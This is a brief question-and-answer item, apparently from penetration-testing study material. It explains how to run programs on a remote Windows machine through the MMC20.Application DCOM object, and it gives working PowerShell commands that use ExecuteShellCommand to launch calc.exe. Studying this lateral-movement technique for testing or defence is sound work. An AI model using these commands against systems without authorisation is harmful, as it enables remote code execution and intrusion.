How can an attacker execute a program on a remote system using the MMC20.Application DCOM object?

An attacker first creates a DCOM instance of `MMC20.Application` on the remote machine using PowerShell: `$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","targetIP"))`. Then they call the `ExecuteShellCommand` method to launch a program, e.g., `$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")`. This requires administrative credentials and is most effective when the firewall is disabled or bypassed. See Domain Penetration - Executing Programs on Remote Systems Using DCOM for full details.